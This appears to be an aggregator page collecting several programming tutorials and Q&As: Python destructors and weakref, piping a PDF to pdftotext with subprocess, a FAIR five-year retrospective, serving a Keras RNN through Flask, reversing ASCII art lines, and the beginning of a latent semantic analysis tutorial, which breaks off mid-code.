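    def __init__(self, id, parent):
        self.id = id
        self.parent = parent
        print 'Foo', self.id, 'born'

    def __del__(self):
        print 'Foo', self.id, 'died'

class BarType(object):
    def __init__(self, id):
        self.id = id
        self.foo = FooType(id, self)
        print 'Bar', self.id, 'born'

    def __del__(self):
        print 'Bar', self.id, 'died'

b = BarType(12)

Output:

Foo 12 born
Bar 12 born

Oops... what happened? Where are the destructors? Here's what the Python documentation has to say on the matter:

Circular references which are garbage are detected when the optional cycle detector is enabled (it's on by default), but can only be cleaned up if there are no Python-level __del__() methods involved.

Python doesn't know the order in which it's safe to destroy objects that hold circular references to each other, so as a design decision, it simply doesn't call the destructors of such objects!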
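The behaviour described above is that of the Python 2 versions the article targets. Since Python 3.4 (PEP 442), the cycle detector does call __del__ on objects that are part of a garbage cycle. The following Python 3 sketch of the same two classes shows this on CPython; the events list and the explicit gc.disable()/gc.collect() calls are additions for this illustration, used so that the moment of collection is under our control.

```python
import gc

gc.disable()   # keep the automatic collector from running mid-example
events = []


class FooType:
    def __init__(self, id, parent):
        self.id = id
        self.parent = parent          # strong reference back to the parent: a cycle
        events.append("Foo %s born" % id)

    def __del__(self):
        events.append("Foo %s died" % self.id)


class BarType:
    def __init__(self, id):
        self.id = id
        self.foo = FooType(id, self)
        events.append("Bar %s born" % id)

    def __del__(self):
        events.append("Bar %s died" % self.id)


b = BarType(12)
del b                      # reference counting alone cannot free the cycle
died_before_gc = [e for e in events if e.endswith("died")]
gc.collect()               # the cycle detector finds the pair and finalizes both
died_after_gc = [e for e in events if e.endswith("died")]
gc.enable()

print(died_before_gc)         # [] on CPython
print(sorted(died_after_gc))  # ['Bar 12 died', 'Foo 12 died']
```

Even so, the destructors only run when the cycle detector gets around to the pair, not at the moment the last outside reference disappears, so the timing concerns discussed in the article still apply.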

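So, what now?

Should we avoid destructors because of this deficiency? I'm very surprised to see that many Pythonistas think so, and recommend using explicit close methods instead. But I disagree: explicit close methods are less safe, because they are easy to forget to call. Moreover, when exceptions can happen (and in Python they happen all the time), managing explicit closing becomes very difficult and burdensome.

I actually think that destructors can and should be used safely in Python. With a little care, it's definitely possible.

First and foremost, note that justified circular references are rare. I say justified on purpose: a lot of the circular references that do show up are an artifact of bad design and leaky abstractions.

As a rule of thumb, resources should be held by the lowest-level object possible. Don't hold a DB resource directly in your GUI dialog. Use an object to encapsulate the DB connection and close it safely in the destructor. The DB object has no reason to hold references to other objects in your code. If it does, it violates several good design practices.

Sometimes dependency injection can help prevent circular references in complex code, but even in the rare cases where you find yourself needing a true circular reference, there's a solution. Python provides the weakref module for this purpose. The documentation quickly reveals that this is exactly what we need here:

A weak reference to an object is not enough to keep the object alive: when the only remaining references to a referent are weak references, garbage collection is free to destroy the referent and reuse its memory for something else. A primary use for weak references is to implement caches or mappings holding large objects, where it's desired that a large object not be kept alive solely because it appears in a cache or mapping.

Here's the previous example rewritten with weakref:

import weakref

class FooType(object):
    def __init__(self, id, parent):
        self.id = id
        self.parent = weakref.ref(parent)
        print 'Foo', self.id, 'born'

    def __del__(self):
        print 'Foo', self.id, 'died'

class BarType(object):
    def __init__(self, id):
        self.id = id
        self.foo = FooType(id, self)
        print 'Bar', self.id, 'born'

    def __del__(self):
        print 'Bar', self.id, 'died'

b = BarType(12)

Now we get the result we want:

Foo 12 born
Bar 12 born
Bar 12 died
Foo 12 died

The small change in this example is that I use weakref.ref to assign the parent reference in the FooType constructor. This is a weak reference, so it doesn't really create a cycle. Since the GC sees no cycle, it destroys both objects.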
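One detail the example leaves implicit is how the child gets at its parent again: a weakref.ref object has to be called to obtain the referent, and it returns None once the referent is gone. A Python 3 sketch follows; the parent_id helper and the events list are additions for this illustration, and the order of the two "died" entries is what CPython's reference counting produces.

```python
import weakref

events = []


class FooType:
    def __init__(self, id, parent):
        self.id = id
        self.parent = weakref.ref(parent)   # weak: does not keep the parent alive
        events.append("Foo %s born" % id)

    def parent_id(self):
        parent = self.parent()              # call the weak reference to dereference it
        return None if parent is None else parent.id

    def __del__(self):
        events.append("Foo %s died" % self.id)


class BarType:
    def __init__(self, id):
        self.id = id
        self.foo = FooType(id, self)
        events.append("Bar %s born" % id)

    def __del__(self):
        events.append("Bar %s died" % self.id)


b = BarType(12)
print(b.foo.parent_id())   # 12
del b                      # no cycle, so reference counting frees both right away
print(events)
# ['Foo 12 born', 'Bar 12 born', 'Bar 12 died', 'Foo 12 died']
```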

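Conclusions

Python has perfectly usable object destructors via the __del__ method. They work fine for the vast majority of use cases, but choke on circular references. Circular references, however, are usually a sign of bad design, and few of them are justified. For the very few use cases where justified circular references have to be used, the cycles are easy to break with weak references, which Python provides in the weakref module.

References

Some links that were useful in preparing this article:

- Python destructor and garbage collection notes
- RAII
- The Python documentation
- This and also this Stack Overflow discussions.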

↧

Using subprocess.popen in python with the os.tmp file ...

December 7, 2018, 7:46 pm


I am writing a Python program on Linux, and part of it runs the pdftotext executable to convert a PDF to text. The code I am currently using is given below.

pdfData = currentPDF.read()
tf = os.tmpfile()
tf.write(pdfData)
tf.seek(0)
out, err = subprocess.Popen(["pdftotext", "-", "-"], stdin = tf, stdout=subprocess.PIPE ).communicate()

This works fine, but now I want to run the pdftotext executable with the -layout option (which preserves the layout of the document). I tried replacing the "-" with layout, replacing "pdftotext" with "pdftotext -layout", etc. None of it works; they all give me empty text. Since the input is being piped in via the temp file, I am having trouble figuring out the argument list. Most of the documentation on Popen assumes all the parameters are being passed in through the argument list, but in my case the input is being passed in through the temp file.

Any help would be greatly appreciated.

This works for me:

out, err = subprocess.Popen(
    ["pdftotext", '-layout', "-", "-"],
    stdin = tf, stdout=subprocess.PIPE ).communicate()

Although I couldn't find explicit confirmation in the man page, I believe the first - tells pdftotext to expect PDF-file to come from stdin, and the second - tells pdftotext to expect text-file to be sent to stdout.
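The key point is that every option is its own element of the argument list, placed before the two "-" file arguments. Here is a sketch of the same approach for Python 3, where os.tmpfile() no longer exists and tempfile.TemporaryFile takes its place. The helper names build_pdftotext_cmd and pdf_to_text are made up for this example, and pdf_to_text assumes a pdftotext executable is on the PATH.

```python
import subprocess
import tempfile


def build_pdftotext_cmd(layout=False):
    """Build the argument list: options first, then input and output ('-' = stdin/stdout)."""
    cmd = ["pdftotext"]
    if layout:
        cmd.append("-layout")   # each option is its own list element
    cmd += ["-", "-"]
    return cmd


def pdf_to_text(pdf_bytes, layout=False):
    """Feed PDF bytes to pdftotext through a temporary file and return the text as bytes."""
    with tempfile.TemporaryFile() as tf:   # replaces os.tmpfile(), which Python 3 lacks
        tf.write(pdf_bytes)
        tf.seek(0)
        proc = subprocess.run(
            build_pdftotext_cmd(layout),
            stdin=tf,
            stdout=subprocess.PIPE,
            check=True,          # raise CalledProcessError on a non-zero exit status
        )
    return proc.stdout


print(build_pdftotext_cmd(layout=True))
# ['pdftotext', '-layout', '-', '-']
```

Without shell=True, Popen treats the first list element as the program name, which is why "pdftotext -layout" written as a single string is not found as a program.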

↧

Five years of FAIR!

December 7, 2018, 10:16 pm


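In 2013, Facebook announced the creation of FAIR at the NeurIPS conference. Five years on, what has FAIR been through? What has it achieved? What impact has it had on the world? FAIR founder Yann LeCun, current FAIR lead Jerome Pesenti and Facebook CTO Mike Schroepfer look back on FAIR's five years.

Five years ago, we created the Facebook AI Research group (FAIR) to advance AI through open research for the benefit of all. FAIR's goal is to understand the nature of intelligence so that we can create truly intelligent machines. Since then, FAIR has kept growing into an international research organization with labs in Menlo Park, New York, Paris, Montreal, Tel Aviv, Seattle, Pittsburgh and London. AI has become central to Facebook, so FAIR is now part of the larger Facebook AI organization, which works on all aspects of AI R&D, from fundamental research to applied research and technology development.

FAIR applies an open model to every aspect of our work and collaborates broadly with the community. Our teams often publish cutting-edge research early and open-source research code, data sets and tools (such as PyTorch, fastText, FAISS and Detectron) wherever possible. This approach has also been successful at advancing AI research. This year, FAIR researchers have won broad recognition, with Best Paper awards at ACL, EMNLP, CVPR and ECCV, and Test of Time awards at ECCV, ICML and NeurIPS. Working in the open lets everyone make faster progress in AI.

Giving machines true intelligence is both a scientific challenge and a technological and product engineering problem. A large part of FAIR's research focuses on fundamental questions about the keys to reasoning, prediction, planning and unsupervised learning. In turn, exploring these areas requires a better theoretical understanding of fields such as generative models, causality, high-dimensional stochastic optimization and game theory. Unlocking the full future potential of AI requires these long-term research explorations. We have picked a handful of the projects we tackled over the past five years to show how FAIR has pursued its mission, contributed to the field and had an impact on the world.

This timeline highlights many of the projects FAIR has completed over the past five years.

Memory networks

In 2014, FAIR researchers identified an intrinsic limitation of neural networks: long-term memory. Although neural networks can learn while training on a data set, once these systems are running they typically have no way to store new information that would help them solve a specific task later. So we developed a new class of learning machines that remember enough of an interaction to answer general knowledge questions and refer back to earlier statements in a conversation. In the early 2014 paper on this approach, "Memory Networks", we tested this by having a memory-enabled network answer questions about the plot of The Lord of the Rings, based on a short summary of the series given to it. The network was able to learn simple linguistic patterns, generalize to the meaning of unknown words and answer the questions correctly.

Over the next two years, FAIR continued to develop this approach, broadening the scope of the research and exploring related areas. The team augmented RNNs with a push-pop stack, giving StackRNN, which can be trained from sequences in an unsupervised manner. The team built the bAbI data set of question-answering tasks to help test performance on text understanding. bAbI is now part of the open-source project ParlAI, which contains thousands of dialogue examples, ranging from responses to restaurant reservation requests to answers about movie casts. We also iterated on the memory network architecture to make it increasingly useful for real-world applications. These updates include end-to-end memory networks (which let the network work with less supervision) and key-value memory networks (which can be trained by generalizing from completely unsupervised sources such as Wikipedia entries).

Self-supervised learning and generative models

Scaling AI by using large amounts of unlabeled data through self-supervised learning (SSL) has long been a priority at FAIR. With SSL, a machine can learn abstract representations of the world from the unlabeled images, video or audio fed to it. One example of SSL is showing a machine video clips and training it to predict the frames that follow. By learning to predict, the machine captures knowledge about how the world works and learns abstract representations of it. With SSL, the machine learns by observation, bit by bit, much like babies and young animals, slowly accumulating a large amount of background knowledge about the world. We hope this can lead to a form of common sense. Acquiring predictive models of the world is also key to building AI systems that can reason, predict the consequences of their actions and act in the real world.

In 2014, our friends at the Montreal Institute for Learning Algorithms (MILA) at Université de Montréal, Ian Goodfellow and colleagues, proposed a new unsupervised learning method: generative adversarial networks (GANs). We were immediately fascinated by the potential applications of this self-supervised learning approach. But promising as GANs looked, at the time they had only been shown to work on a few simple problems. Starting in 2015, we published a series of papers to help convince the research community that GANs really do work. GANs are used to train machines to make predictions under uncertainty by pitting two neural networks against each other. In a typical GAN architecture, a generator network produces data, such as an image or a video frame, from a bunch of random numbers (possibly together with past video frames). Meanwhile, a discriminator network has to tell real data (real images and video frames) from the generator's "fake" output. This ongoing contest optimizes both networks and leads to better and better predictions.

Each of our papers focused on a different variant of GANs, including image generation in deep convolutional generative adversarial networks (DCGANs) and Laplacian adversarial networks (LAPGANs), and video prediction in adversarial gradient difference loss predictors (AGDLs). But our shared contribution was to show that GANs can "create" realistic-looking images of things such as nonexistent bedrooms, faces or dogs.

The example above shows a series of fashion designs created by a generative network.

Other researchers have since picked up our work on GANs and used them to generate amazing high-resolution images. But GANs are notoriously hard to tune and often fail to converge. So FAIR explored ways of making GANs more reliable by understanding adversarial training at a theoretical level. In 2017, we proposed the Wasserstein GAN (WGAN) method, which makes the discriminator "smoother" and more efficient at telling the generator how to improve its predictions. WGAN was essentially the first GAN to converge robustly across a wide range of applications. It avoids the need to balance the outputs of the discriminator and the generator while the system is being optimized, which makes learning significantly more stable, especially for high-resolution image generation tasks.

Since then, FAIR researchers and Facebook engineers have used adversarial training methods in a range of applications, including long-term video prediction and the creation of fashion pieces. But the really interesting part of GANs is what they mean for the future. As a completely new technique that was not available to us a few years ago, it opens new opportunities to generate data in areas where we have little of it. It may be a key tool for building machines that learn on their own.

Text classification at scale

Text understanding is not a single task but a sprawling matrix of subtasks, such as turning the words, phrases and entire data sets of a language into a format machines can process. But before any of that work can be done, the text itself has to be classified. Years ago, NLP models such as word2vec classified text through extensive word-based training, with the model assigning a distinct vector to each word in its training data set. For Facebook, those approaches were too slow and too dependent on fully supervised data. We needed to classify text in hundreds or even thousands of languages, many of which do not have large data sets. The text classification system needed to scale to all of our text-based features and services, as well as to our NLP research.

So in 2016 FAIR built fastText, a framework for rapid text classification that learns word representations while also taking the morphology of words into account. In the paper "Enriching Word Vectors with Subword Information", published in 2017, FAIR proposed a model that assigns vectors to "subword units" rather than to whole words, letting the system create representations for words that did not appear in the training data. The resulting model scales to billions of words, can learn from new, untrained words, and trains significantly faster than typical deep learning classifiers. In some cases, training that took previous models days takes fastText only seconds.

fastText has proved to be a major contribution to AI-based language understanding and is now available for 157 languages. The original paper has been cited more than a thousand times, and fastText remains the most commonly used baseline for word-embedding systems. Outside Facebook, fastText has been used in a wide range of applications, from the familiar, such as message reply suggestions, to the exotic, such as THE GREAT OUTDOORS, an "algorithmic theater" production that uses fastText to help select and sort public internet comments, which then serve as the script for each performance. The fastText framework has been deployed at Facebook to classify text in 19 languages, and it is also used in DeepText for translation and natural language understanding.

Cutting-edge translation research

Fast, accurate and flexible translation is an important part of helping people around the world communicate. So early on, FAIR set out to find a new approach that would outperform statistical machine translation, the state of the art at the time. It took us three years to build a CNN-based neural machine translation architecture that combines speed, accuracy and learning. In our experiments, the approach was nine times faster than the best RNNs of the time.

Our multi-hop CNNs are not only easier to train on smaller data sets, they are also better at understanding misspelled or abbreviated words, such as translating "tmrw" (short for tomorrow) into "mañana" (Spanish for "tomorrow"). Overall, this NMT approach improved translation accuracy by 11% and made translation delivery 2.5 times faster. Besides improving our own systems, we open-sourced the code and models for fairseq.

To get around machine translation's need for large training data sets (usually called corpora), we have also explored other approaches, such as multilingual embeddings, which can be trained across multiple languages. Last year we open-sourced MUSE, a Python library for learning multilingual word embeddings that offers two approaches: a supervised one that uses the 110 bilingual dictionaries included in the release, and an unsupervised one that builds a new bilingual dictionary between two languages without any parallel corpus. We followed this with research on unsupervised machine translation; the paper "Phrase-Based & Neural Unsupervised Machine Translation" won the best long paper award at EMNLP and showed a dramatic improvement in full-sentence translation with unsupervised training.

Two-dimensional word embeddings in two languages (left, center) can be aligned by a simple rotation (right). After the rotation, word translation can be performed by nearest-neighbor search.

By sharing research and resources such as fairseq and MUSE, we encourage everyone to take advantage of faster, more accurate and more versatile translation techniques, whether for research or for production applications.

AI tools for everyone

Progress in AI depends not only on breakthrough ideas but also on powerful platforms and tools for testing and implementing them. FAIR has made building these systems a priority and shares the results with the world. In 2015, we open-sourced a large set of Torch deep learning modules created by FAIR to speed up the training of large neural networks. In 2016, we released Torchnet to make it simpler and faster for the community to build effective, reusable learning systems. Shortly afterward, we open-sourced Caffe2, a modular deep learning framework for mobile computing that now runs neural networks on more than 1 billion phones worldwide. We then worked with Microsoft and Amazon to release the neural network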

↧

How hard is it to deploy a deep learning model as a web application? Find out for yourself

December 7, 2018, 10:14 pm


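This article shows how to deploy a trained Keras deep learning model as a web application. It involves quite a few technologies, but don't you want to give it a try?

Building a machine learning project is cool, but in the end you usually want other people to be able to see your work. Sure, you could put the whole project on GitHub, but your grandparents would probably struggle to make sense of that. So what we want is to deploy our deep learning model as a web application that anyone can access.

In this article, you'll see how to write a web application that takes a trained Keras recurrent neural network and lets users generate new patent abstracts. The project builds on the recurrent neural network work from the example article below, but we don't need to know how that network was created. For now we simply treat it as a black box: we feed in a starting sequence, it outputs an entirely new patent abstract, and we can display that in the browser!

Example article: https://medium.com/p/ffd204f99470?source=user_profile---------6------------------

Traditionally, data scientists develop the models and front-end engineers show them to the world. In this project we play both roles and dive into web application development (though almost all of it in Python).

This project covers the following topics:

- Flask: creating a basic web application in Python
- Keras: deploying a trained recurrent neural network
- Templating with the Jinja template library
- HTML and CSS for writing web pages

The end result is a web application that lets users generate entirely new patent abstracts with a trained recurrent neural network:

The complete code for the project is available at:

https://github.com/WillKoehrsen/recurrent-neural-networks

Approach

The goal was to get a web application up and running as quickly as possible. For that, I chose the Flask framework, which lets us write the application in Python. I don't like fiddling with styling, so almost all of the CSS is copied and pasted. The following two articles are useful for the basics and also make good guides: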

https://towardsdatascience.com/deploying-keras-deep- learningmodel -with-flask-5da4181436a2

https://towardsdatascience.com/deploying-keras-deep-learning-models-with-flask-5da4181436a2

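Overall, this project follows my design principles: get a prototype up and running quickly, copying and pasting as much as needed, then iterate to make a better product.

A basic web application with Flask

The quickest way to build a web application in Python is with Flask. We can make our own web application like this: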

from flask import Flask

app = Flask(__name__)

@app.route("/")
def hello():
    return "<h1>Not Much Going On Here</h1>"

app.run(host='0.0.0.0', port=50000)

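If you copy and paste this code and run it, you can view your web application in the browser at localhost:50000. Of course, we want to do more than that, so we'll use a slightly more complicated function that basically does the same thing: it handles requests from the browser and serves up some content as HTML. On the main page, we present the user with a form for entering some details.

User input form

When users open the application's main page, we show them a form with three parameters to choose:

- Input a starting sequence for the RNN, or have the server pick one at random
- Choose the diversity of the RNN predictions
- Choose the number of words the RNN outputs

We'll use wtforms to build the form in Python. The code for the form is: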

from wtforms import (Form, TextField, validators, SubmitField,
                     DecimalField, IntegerField)

class ReusableForm(Form):
    """User entry form for entering specifics for generation"""
    # Starting seed
    seed = TextField("Enter a seed string or 'random':", validators=[
                     validators.InputRequired()])
    # Diversity of predictions
    diversity = DecimalField('Enter diversity:', default=0.8,
                             validators=[validators.InputRequired(),
                                         validators.NumberRange(min=0.5, max=5.0,
                                         message='Diversity must be between 0.5 and 5.')])
    # Number of words
    words = IntegerField('Enter number of words to generate:',
                         default=50, validators=[validators.InputRequired(),
                                                 validators.NumberRange(min=10, max=100,
                                                 message='Number of words must be between 10 and 100')])
    # Submit button
    submit = SubmitField("Enter")

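This creates the form shown below (styled with main.css):

The validators in the code make sure the user enters the right information. For example, we check that every field is filled in and that diversity is between 0.5 and 5. Only forms that meet these conditions are accepted.

Validation errors

We actually serve up these forms through Flask templates.

Templates

A template is a document with a basic framework whose details we need to fill in. For a Flask web application, we can use the Jinja template library to embed Python code in an HTML document. For example, in our main function we send the contents of the form to a template called index.html.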

from flask import render_template, request

# Home page
@app.route("/", methods=['GET', 'POST'])
def home():
    """Home page of app with form"""
    # Create form
    form = ReusableForm(request.form)
    # Send template information to index.html
    return render_template('index.html', form=form)

When the user opens the main page, our application serves up a page based on the index.html template, filled with the details from form. The template is a simple HTML scaffold in which we refer to Python variables with the {{variable}} syntax.

<!DOCTYPE html>
<html>

<head>
  <title>RNN Patent Writing</title>
  <link rel="stylesheet" href="/static/css/main.css">
  <link rel="shortcut icon" href="/static/images/lstm.ico">
</head>

<body>
  <div class="container">
    <h1>
      <center>Writing Novel Patent Abstracts with Recurrent Neural Networks</center>
    </h1>
    {% block content %}
    {% for message in form.seed.errors %}
    <div class="flash">{{ message }}</div>
    {% endfor %}
    {% for message in form.diversity.errors %}
    <div class="flash">{{ message }}</div>
    {% endfor %}
    {% for message in form.words.errors %}
    <div class="flash">{{ message }}</div>
    {% endfor %}
    <form method=post>
      {{ form.seed.label }}
      {{ form.seed }}
      {{ form.diversity.label }}
      {{ form.diversity }}
      {{ form.words.label }}
      {{ form.words }}
      {{ form.submit }}
    </form>
    {% endblock %}
  </div>
</body>

</html>

Every error in the form (an entry that fails validation) flashes an error message. If there are no errors, this file displays the form shown above.

When the user enters information and submits the form (a POST request), if the information is valid we pass the input to the appropriate function and make predictions with the trained RNN. That means we need to modify home().

from flask import request
# User defined utility functions
from utils import generate_random_start, generate_from_seed

# Home page
@app.route("/", methods=['GET', 'POST'])
def home():
    """Home page of app with form"""
    # Create form
    form = ReusableForm(request.form)
    # On form entry and all conditions met
    if request.method == 'POST' and form.validate():
        # Extract information
        seed = request.form['seed']
        diversity = float(request.form['diversity'])
        words = int(request.form['words'])
        # Generate a random sequence
        if seed == 'random':
            return render_template('random.html',
                                   input=generate_random_start(model=model,
                                                               graph=graph,
                                                               new_words=words,
                                                               diversity=diversity))
        # Generate starting from a seed sequence
        else:
            return render_template('seeded.html',
                                   input=generate_from_seed(model=model,
                                                            graph=graph,
                                                            seed=seed,
                                                            new_words=words,
                                                            diversity=diversity))
    # Send template information to index.html
    return render_template('index.html', form=form)

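Now, when the user clicks submit and the information is valid, the application sends the input to either generate_random_start or generate_from_seed, depending on what was entered in the first text box. These functions use the trained Keras model to generate a new patent abstract with the diversity and number of words the user specified. Their output is then passed to the random.html or seeded.html template, respectively, to serve up a new web page.

Making predictions with a pretrained Keras model

The model parameter specifies the trained Keras model, which is loaded as follows: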

from keras.models import load_model
import tensorflow as tf

def load_keras_model():
    """Load in the pre-trained model"""
    global model
    model = load_model('../models/train-embeddings-rnn.h5')
    # Required for model to work
    global graph
    graph = tf.get_default_graph()

load_keras_model()

（「tf.get_default_graph()」是基于下面的 github gist 采取的一种解决方案：https://gist.github.com/eyesonlyhack/2f0b20f1e73aaf5e9b83f49415f3601a

在这里，我们不会完整地展示这两个「util」函数，你要知道的是，它们使用训练好的 Keras 模型以及相应的参数，并对一个新的专利摘要进行预测。

完整代码见：https://github.com/willkoehrsen/recurent -neural-networks/blob/master/deployment/utils.py

这些函数都返回带有格式化的 HTML 的 Python 字符串。该字符串将被传递给另一个模板，作为 web 页面呈现出来。例如，「generate_random_start」返回的格式化的 html 会带用户跳转到 random.html：

<!DOCTYPE html> <html> <header> <title>Random Starting Abstract </title> <link rel="stylesheet" href="/static/css/main.css"> <link rel="shortcut icon" href="/static/images/lstm.ico"> <ul> <li><a href="/">Home</a></li> </ul> </header> <body> <div class="container"> {% block content %} {{input|safe}} {% endblock %} </div> </body> </html>

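Here we again use the Jinja template engine to display the formatted HTML. Because the Python string is already formatted as HTML, all we have to do is use {{input|safe}} (where input is the Python variable) to display it; the "safe" filter tells Jinja not to escape the markup. We can then style the page with "main.css", just as with any other HTML template.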
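To make "a Python string already formatted as HTML" concrete, here is a minimal sketch using only the standard library. The helper name format_sequence, the headings, and the sample text are illustrative assumptions; this is not the code in utils.py. Since the template marks the string as safe, any raw text has to be escaped before it is wrapped in tags.

```python
from html import escape

def format_sequence(seed_text, generated_text):
    """Hypothetical helper: wrap a seed and its generated continuation in HTML."""
    # Escape the raw text so stray '<' or '&' characters cannot break the page,
    # because the template will render this string without further escaping.
    seed_html = escape(seed_text)
    gen_html = escape(generated_text)
    return (
        f"<div><h3>Seed sequence</h3><p>{seed_html}</p></div>"
        f"<div><h3>RNN output</h3><p>{gen_html}</p></div>"
    )

html_string = format_sequence("a method for <fast> cooling", "of a device & system")
print(html_string)
```

A string built this way can be handed to render_template as the input variable and displayed with {{input|safe}}.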

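Output

The "generate_random_start" function picks a random patent abstract as the starting input sequence and makes predictions from it. It then displays the starting input sequence, the output produced by the recurrent neural network, and the actual output:

Output from a random starting sequence.

The "generate_from_seed" function takes a starting sequence supplied by the user and then uses the trained recurrent neural network to make predictions and build the output:

Output from a user-supplied starting sequence.

Although the results are not always entirely on point, they do show that the recurrent neural network has learned the basics of English. The model was trained to predict the next word from the previous 50 words, and it has picked up how to write a reasonably convincing patent abstract! Depending on the "diversity" of the predictions, the output may come out completely random or may loop.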
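A note on what "diversity" does. The sketch below assumes the common temperature-style approach, in which the predicted log-probabilities are divided by the diversity before one word is sampled. The helper name sample_with_diversity and the toy probabilities are illustrative and are not taken from utils.py.

```python
import math
import random

def sample_with_diversity(probs, diversity, rng=random):
    """Re-weight a probability distribution by `diversity` and sample an index."""
    # Divide log-probabilities by the diversity (often called temperature).
    logits = [math.log(max(p, 1e-12)) / diversity for p in probs]
    # Softmax, subtracting the max for numerical stability.
    top = max(logits)
    weights = [math.exp(value - top) for value in logits]
    total = sum(weights)
    reweighted = [w / total for w in weights]
    # Draw one index according to the re-weighted distribution.
    index = rng.choices(range(len(probs)), weights=reweighted, k=1)[0]
    return index, reweighted

probs = [0.6, 0.3, 0.1]  # toy next-word probabilities
idx, sharp = sample_with_diversity(probs, diversity=0.2)
_, flat = sample_with_diversity(probs, diversity=5.0)
print([round(p, 3) for p in sharp])
print([round(p, 3) for p in flat])
```

A low diversity concentrates almost all the probability on the most likely word, which is what tends to produce loops; a high diversity flattens the distribution, which makes the output look random.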

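Running the app

To run the app, download the repository, change to the "deployment" directory, and type "python run_keras_server.py". The web application is then immediately available at localhost:10000.

Depending on how your home WiFi is configured, you should be able to reach the application from any computer on the network using your IP address.

Next steps

A web application running on a personal computer is great for sharing with friends and family. However, I would not recommend opening it up to everyone on your home network! For that, we will set the app up on an AWS EC2 instance and serve it to the world (coming later).

To improve the app, you could change the styling (through main.css) and perhaps add more options, such as the ability to choose which pre-trained network to use. The great thing about personal projects is that you can take them as far as you like. If you want to play around with the app, download the code from the link below and start experimenting.

Link: https://github.com/WillKoehrsen/recurrent-neural-networks

Conclusions

In this article, we saw how to deploy a trained Keras deep learning model as a web application. Doing so requires bringing together a number of different technologies, including recurrent neural networks, web applications, templates, HTML, CSS, and of course Python.

While this is only a basic application, it shows that you can start building web applications with deep learning for relatively little effort. Not many people can say they have deployed a deep learning model as a web application, and if you follow this article you can count yourself among them!

Original article: https://towardsdatascience.com/deploying-a-keras-deep-learning-model-as-a-web-application-in-p-fc0f2354a7ff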

↧

Vertically display ASCII art with Python

December 7, 2018, 10:12 pm

≫ Next: Implementing Latent Semantic Analysis in Python

≪ Previous: How hard is it to deploy a deep learning model as a web app? Find out for yourself

For another program I am working on, I need to flip an ASCII image vertically. I want to turn this:

  *
 ***
*****
 ***
 ***

into this:

 ***
 ***
*****
 ***
  *

All I have right now is code that reads multiple lines of input, but how do I make it print the first line last and the bottom line first?

text = ""
stopword = ""
while True:
    line = input()
    if line.strip() == stopword:
        break

You can add each line to a list of lines ( list.append ) and then invert that list ( list[::-1] ) before printing:

lines = []
stopword = ""
while True:
    line = input()
    if line.strip() == stopword:
        break
    lines.append(line)  # Add to the list of lines
for line in lines[::-1]:  # [::-1] inverts the list
    print(line)
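The same idea can be written as a small function that works on a string instead of interactive input, which makes it easier to reuse and to check. This is only a sketch; the name flip_vertical and the sample art are made up for illustration.

```python
def flip_vertical(art):
    """Return the ASCII art with its rows in reverse order."""
    rows = art.splitlines()
    return "\n".join(reversed(rows))

tree = "  *\n ***\n*****\n ***\n ***"
flipped = flip_vertical(tree)
print(flipped)
```

Flipping twice gives back the original, which is a quick sanity check that no rows were lost.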

↧

Implementing Latent Semantic Analysis in Python

December 7, 2018, 10:10 pm

≫ Next: Notes from the Huxiang Cup offline AWD

≪ Previous: Vertically display ASCII art with Python

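Introduction

Have you ever been inside a well-run library? I'm always impressed by the way librarians keep everything organized by title, content, or other topics. But if you handed them thousands of books and asked them to arrange them by genre, they would struggle to finish in a day, let alone an hour!

If those books came in digital form, however, this wouldn't be a problem for you, would it? All the sorting would take a matter of seconds, with no manual effort. All hail Natural Language Processing (NLP)!

Have a look at the passage below:

From the highlighted words you can conclude that the passage covers three topics (or concepts): Topic 1, Topic 2, and Topic 3. A good topic model can identify similar words and group them under one topic. The most dominant topic in the example above is Topic 2, which indicates that the text is primarily about fake videos.

Intrigued? Good! In this article, we will learn about a text mining approach called topic modeling. It is an extremely useful technique for extracting topics, and one you will use often when faced with NLP challenges.

Note: I highly recommend going through this article to understand terms such as SVD and UMAP. They come up often in this article, so a basic understanding of them will help solidify the concepts.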

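1. What is a topic model?

2. When is topic modeling used?

3. Overview of Latent Semantic Analysis (LSA)

4. Implementing LSA in Python

Data reading and inspection

Data preprocessing

Document-Term Matrix

Topic modeling

Topics visualization

5. Pros and cons of LSA

6. Other techniques for topic modeling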

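What is a topic model?

A topic model can be defined as an unsupervised technique for discovering topics across a large collection of documents. These topics are abstract in nature: words that are related to each other form a topic. Likewise, a single document can contain multiple topics. For now, let's think of a topic model as a black box, as illustrated in the figure below:

This black box (the topic model) forms clusters of similar and related words, which are called topics. These topics have a certain distribution within a document, and every topic is defined by the proportion of the different words it contains.

When is topic modeling used?

Recall the earlier example of arranging similar books together. Now suppose you had to perform a similar task on a set of digital documents. As long as the number of documents is manageable, you could do it by hand. But what if there are a very large number of them?

That's where NLP techniques come to the fore, and for this particular task topic modeling is a very good fit.

Topic modeling helps in exploring large amounts of text data, finding clusters of words, measuring similarity between documents, and discovering abstract topics. As if these reasons weren't compelling enough, topic modeling is also used in search engines, to judge how well a search string matches the results. Getting interesting, isn't it? Then read on!

Overview of Latent Semantic Analysis (LSA)

All languages have their own intricacies and nuances, such as synonymy (several words sharing one meaning) and polysemy (one word having several meanings), which are hard for a machine to capture (and are sometimes misunderstood even by humans!).

For example, consider the following two sentences:

1. I liked his last novel quite a lot.

2. We would like to go for a novel marketing campaign.

In the first sentence, 'novel' refers to a book, while in the second it means new or fresh.

We can easily tell these words apart because we understand the context behind them. A machine, however, cannot capture this concept, because it does not understand the context in which the words are used. This is where Latent Semantic Analysis (LSA) comes in: it uses the context around the words to capture the hidden concepts, that is, the topics.

So simply mapping words to documents won't really help. What we really need is to work out the hidden concepts or topics behind the words. LSA is one technique that can find these hidden topics. Let's now dig into the inner workings of LSA.

Steps involved in implementing LSA

Suppose we have m documents containing n unique terms (words). We want to extract k topics from all the text data in the documents. The number of topics, k, has to be specified by the user.

Generate a document-term matrix of shape m×n whose entries are TF-IDF scores.

Then reduce the dimensionality of this matrix to k (the desired number of topics) using singular value decomposition (SVD).

SVD decomposes a matrix into three other matrices. If we decompose a matrix A using SVD, we obtain the matrices U, S, and VT (the transpose of matrix V), such that A = U S VT.

Each row of the matrix Uk (the document-topic matrix) is the vector representation of the corresponding document. The length of these vectors is k, the desired number of topics. The vector representations of the terms in our data can be found in the matrix Vk (the term-topic matrix).

So SVD gives us vectors for every document and every term in our data, each of length k. We can then use these vectors to find similar words and similar documents with the cosine similarity method.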
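As a rough illustration of that last step, here is cosine similarity written out with the standard library. The three document vectors are made-up values with k = 3; they are not output from a real SVD.

```python
import math

def cosine_similarity(u, v):
    """Cosine of the angle between two equal-length vectors."""
    dot = sum(a * b for a, b in zip(u, v))
    norm_u = math.sqrt(sum(a * a for a in u))
    norm_v = math.sqrt(sum(b * b for b in v))
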